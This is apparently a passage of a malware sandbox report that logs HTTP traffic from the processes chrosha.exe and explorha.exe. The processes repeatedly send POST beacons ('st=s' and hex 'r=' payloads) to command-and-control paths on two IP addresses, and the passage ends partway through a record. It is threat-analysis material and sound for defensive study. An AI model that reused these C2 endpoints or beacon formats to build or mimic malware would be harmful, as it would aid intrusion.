                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1103192.168.2.550957193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:02.839169979 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:03.088778019 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1104192.168.2.550958193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:03.231445074 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:03.479222059 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1105192.168.2.550959193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:03.339375973 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:03.590373039 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1106192.168.2.550960193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:03.725970984 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:03.969096899 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1107192.168.2.550961193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:03.943883896 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:04.182239056 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1108192.168.2.550962193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:04.320468903 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:04.567733049 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1109192.168.2.550963193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:04.432075024 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:04.682537079 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1110192.168.2.550964193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:04.820662975 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:05.073395014 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1111192.168.2.550965193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:05.039714098 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:05.282474995 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1112192.168.2.550966193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:05.430577993 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:05.678369999 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1113192.168.2.550967193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:05.541215897 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:05.794059992 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1114192.168.2.550968193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:05.928894043 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:06.177108049 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1115192.168.2.550969193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:06.154244900 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:06.405172110 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1116192.168.2.550970193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:06.408929110 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:06.654310942 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1117192.168.2.550971193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:06.533596039 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:06.785207987 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1118192.168.2.550972193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:07.005912066 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:07.250016928 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1119192.168.2.550973193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:07.039937019 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
